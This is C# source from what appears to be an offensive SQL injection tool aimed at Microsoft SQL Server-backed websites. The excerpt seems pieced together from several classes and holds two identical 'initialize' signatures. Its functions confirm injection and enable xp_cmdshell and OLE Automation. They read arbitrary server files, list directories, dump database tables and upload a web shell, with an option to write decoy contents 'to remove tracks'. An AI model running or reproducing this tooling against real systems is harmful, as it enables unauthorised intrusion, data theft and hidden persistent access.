public static void initialize(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
if (createFuncDir(url))
{
string UserChoice = "z";
while (UserChoice != "x")
{
UserChoice = UserInteraction.takeInputString("Press 'x' for Exit..\nEnter Directory to get listing.. eg C:\\, C:\\users\\.. ");
if (UserChoice != "x")
{
navigate(url, UserChoice);
}
}
dropObject(url, QueriesDB.DropFuncQuery);
}
}
else
{
Log.logError("No response from the server..");
}
}
public static string ReadFileDirect(string url, string fileName)
{
string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", fileName);
var response = HTTPMethods.getResponse(FinalFileReadURL);
if (response != null)
{
response = ResponseFilter.getPureResponseWithLastIndex(response);
if (response != null)
{
response = response.Replace(" ", "");
return(response);
}
else
{
return(null);
}
}
else
{
return(null);
}
}
public static string[] getObjects(string url, string stackedQuery, string replacement)
{
string URLFortableDumpToTempTable = QueryCrafter.construcQueryForTableDump(url, stackedQuery, replacement);
if (ResponseFilter.confirmResponce(URLFortableDumpToTempTable, replacement))
{
string URLForTableOutput = QueryCrafter.constructURLForOutputFromTempTable(url);
var response = HTTPMethods.getResponse(URLForTableOutput);
if (response != null)
{
response = ResponseFilter.getPureResponse(response);
return(ResponseFilter.parseResponce(response));
}
else
{
return(null);
}
}
else
{
return(null);
}
}
public static void getColumns(string url, string tableName)
{
string UserColumnQuery = QueryCrafter.constructQueryForColumns(QueriesDB.ColumnStackedQuery, tableName);
string[] Columns = getObjects(url, UserColumnQuery, QueriesDB.Replacement);
if (Columns != null)
{
dropTempTable(url, QueriesDB.DropTableStackedQuery, QueriesDB.Replacement);
Log.showObjects(Columns, "COLUMN");
dumpData(url, tableName, Columns);
}
Columns = null;
}
public static bool dropTempTable(string url, string dropTableStackedQuery, string replacement)
{
url = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
url = QueryCrafter.constructURLForDroppingObject(url, dropTableStackedQuery);
if (HTTPMethods.getResponse(url).Contains(replacement))
{
return(true);
}
else
{
return(false);
}
}
public static bool enableXPCMDShell(string url)
{
string XPCMDShellEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableXPCMDShell);
XPCMDShellEnablingQuery = XPCMDShellEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(XPCMDShellEnablingQuery, QueriesDB.Replacement))
{
Log.logOutput("XP CMD Shell Enabled..");
return(true);
}
Log.logError("Failed to Enable XP CMD Shell..");
return(false);
}
public static bool enableOLEAutomation(string url)
{
string OLEAutomationEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableOLEAutomation);
OLEAutomationEnablingQuery = OLEAutomationEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(OLEAutomationEnablingQuery, QueriesDB.Replacement))
{
Log.logOutput("OLE Automation Enabled..");
return(true);
}
Log.logError("Failed to Enable OLE Automation Procedures..");
return(false);
}
public static void initialize(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
getTables(url);
}
else
{
Log.logError("No response from the server..");
}
}
static void navigate(string url, string dir)
{
var URLForNavigating = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadDirWithFuncQuery);
URLForNavigating = URLForNavigating.Replace("[DIR]", dir);
var response = HTTPMethods.getResponse(URLForNavigating);
response = ResponseFilter.getPureResponseWithLastIndex(response);
response = XML.addRoot(response);
FileIO.createWriteFile(response, "tmp.txt");
List <string> DirectoryFiles = XML.parseXML("tmp.txt", "dir");
Log.showObjects(DirectoryFiles, "DIR Listing");
}
static bool createProcFcUk(string url)
{
try
{
var FcUkProcCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.UploadFileProcQuery);
FcUkProcCreationURL = QueryCrafter.constructURLForConfirmation(FcUkProcCreationURL, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(FcUkProcCreationURL, QueriesDB.Replacement))
{
var FcUkProcConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmFcUkProcQuery);
var response = HTTPMethods.getResponse(FcUkProcConfirmationURL);
if (response != null)
{
if (ResponseFilter.getPureResponseWithLastIndex(response) == "FcUk")
{
Log.logOutput("Procedure to Upload Shell is created..");
return(true);
}
else
{
Log.logError("1 Procedure to Upload Shell cannot be created..");
return(false);
}
}
else
{
Log.logError("2 Procedure to Upload Shell cannot be created..");
return(false);
}
}
else
{
Log.logError("Erroneous response from the server..");
Log.logError("Procedure to Upload Shell cannot be created..");
return(false);
}
}
catch (Exception ex)
{
Log.logError(ex.Message);
return(false);
}
}
static bool createFuncDir(string url)
{
try
{
var DIRFuncCreationURL = QueryCrafter.constructStackedQuery(url, QueriesDB.DirListingFuncQuery);
DIRFuncCreationURL = QueryCrafter.constructURLForConfirmation(DIRFuncCreationURL, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(DIRFuncCreationURL, QueriesDB.Replacement))
{
var DIRFuncConfirmationURL = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ConfirmDirFuncQuery);
var response = HTTPMethods.getResponse(DIRFuncConfirmationURL);
if (response != null)
{
if (ResponseFilter.getPureResponseWithLastIndex(response) == "Dir")
{
Log.logOutput("Function to get Directory Listing is created..");
return(true);
}
else
{
Log.logError("Function to get Directory Listing cannot be created..");
return(false);
}
}
else
{
Log.logError("Function to get Directory Listing cannot be created..");
return(false);
}
}
else
{
Log.logError("Erroneous response from the server..");
Log.logError("Function to get Directory Listing cannot be created..");
return(false);
}
}
catch (Exception ex)
{
Log.logError(ex.Message);
return(false);
}
}
static bool dropObject(string url, string ObjectDroppingQuery)
{
try
{
var DirFuncDroppingQuery = QueryCrafter.constructURLForDroppingObject(url, ObjectDroppingQuery);
DirFuncDroppingQuery = QueryCrafter.constructURLForConfirmation(DirFuncDroppingQuery, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(DirFuncDroppingQuery, QueriesDB.Replacement))
{
return(true);
}
else
{
return(false);
}
}
catch (Exception ex)
{
Log.logError(ex.Message);
return(false);
}
}
public static void Read(string url)
{
string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
string UserChoice = "z";
while (UserChoice != "x")
{
UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
if (UserChoice != "x")
{
string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice);
var response = HTTPMethods.getResponse(FinalFileReadURL);
if (response != null)
{
response = ResponseFilter.getPureResponseWithLastIndex(response);
if (response != null)
{
Log.logOutput("--- [File Contents Start] ---");
Log.logOutput(response);
Log.logOutput("--- [File Cotents End] ---");
UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
if (UserChoice == "s")
{
SaveFile(response);
}
UserChoice = "z";
}
else
{
Log.logError("Either File is empty or you 've no right to read that File..");
}
}
}
}
}
public static void Spawn(string url)
{
Log.logNotification("Confirming Web Response..");
var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement);
if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement))
{
Log.logNotification("Web Response is OK..");
if (createProcFcUk(url))
{
string RootPath = "z";
while (RootPath != "x")
{
RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ ");
if (RootPath != "x")
{
string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx ..");
string UrlForUploading = null;
string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks..");
if (x == "f")
{
UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE);
}
else
{
UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL);
}
UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath);
UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName);
UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement);
Log.logNotification("Uploading shell to " + RootPath + fileName);
if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement))
{
Log.logNotification("Confirming File Upload..");
if (confirmFileUpload(url, RootPath + fileName))
{
Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName);
}
else
{
Log.logError("Fail to upload file..");
}
}
}
}
}
dropObject(url, QueriesDB.DropFcUkProcQuery);
}
else
{
Log.logError("No response from the server..");
}
}
public static void dumpData(string url, string UserSelectedTable, string[] Columns)
{
var FileName = "";
if (!String.IsNullOrEmpty((FileName = UserInteraction.takeInputForTableFileGeneration())))
{
var XAML = XML.addRoot(ResponseFilter.getPureResponse(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
dumpXML(XAML, UserSelectedTable, FileName, Columns);
Log.logNotification("If ur unable to see table Data, dont worry I've another method..");
UserInteraction.promptForUserInput("Press 'n' to try another method OR Press any key to continue..");
var UserInput = Console.ReadLine();
if (UserInput.ToLower() == "n")
{
XAML = XML.addRoot(ResponseFilter.getPureResponseWithLastIndex(HTTPMethods.getResponse(QueryCrafter.constructQueryForDataDump(url, UserSelectedTable, QueriesDB.TableDumpQuery))));
dumpXML(XAML, UserSelectedTable, FileName, Columns);
}
Log.logNotification("Data dump complete.. and if no data is displayed to you.. table might be empty.. Press any key to continue..");
Console.ReadKey();
}
FileIO.deleteTempFile("tmp.txt");
}